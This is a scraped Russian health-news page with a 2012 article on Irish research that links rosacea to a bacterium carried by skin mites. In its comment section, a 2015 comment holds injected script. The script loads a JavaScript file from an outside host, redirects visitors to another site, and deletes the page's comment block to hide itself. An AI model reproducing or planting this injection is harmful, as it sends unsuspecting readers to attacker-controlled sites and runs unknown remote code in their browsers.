Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Дед Мороз – красный нос: ...  >>  Дед Мороз – красный нос: не от холода, а от бактерий
 
Обратная связь
 

Дед Мороз – красный нос: не от холода, а от бактерий

Размер шрифта
29 декабря 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Ирландские ученые установили точную причину распространенного кожного заболевания.

дед мороз

Розацеа – это распространенное кожное заболевание, которое сопровождается воспалением и покраснением кожи на носу, щеках и подбородке. Розацеа чаще встречается у женщин в возрасте 30-50 лет и у людей с ослабленным иммунитетом. Для лечения розацеа используются различные антибиотики, однако, до сих пор не установлено, какая именно бактерия вызывает это заболевание.

Недавно ирланские ученые установили, что возбудителем розацеа является бактерия, которая живет в организме кожных клещей. Кожные клещи есть у всех людей; их количество увеличивается с возрастом и при повреждении кожи, например, при воздействии солнечного излучения. Однако у пациентов с розацеа кожных клещей больше, чем у здоровых людей.

Из организма кожного клеща выделена бактерия, которая продуцирует молекулы, вызывающие иммунную реакцию у пациентов с розацеа. «Бактерия обитает в пищеварительном тракте кожного клеща. Когда клещ погибает, бактерия попадает в окружающие ткани и вызывает воспаление. Чем больше клещей, тем больше бактерий и тем выше риск развития розацеа», – поясняет автор исследования Кевин Кавана.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Голубоглазые красавцы в опасности!   Солнечные ожоги снижают риск рака кожи   Новогодние подарки для вашей кожи   Вы чешетесь из-за вашего дома  
28 декабря 2012Дед Мороз – красный нос: не от холода, а от бактерий 02 августа 2011Виноград защищает от ультрафиолета
 
28 марта 2013Язва желудка защищает от инфаркта и рака 11 сентября 2012Солнечные ожоги снижают риск рака кожи!
 

Слайдшоу

1
Что есть зимой для кожи
Болезни, которые превратят вашу кожу в кошмар!
Вы неправильно мажете крем

Тесты

1
Как выявить контактный дерматит?
Профессиональный оценщик кожи
Мифы о прыщах
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.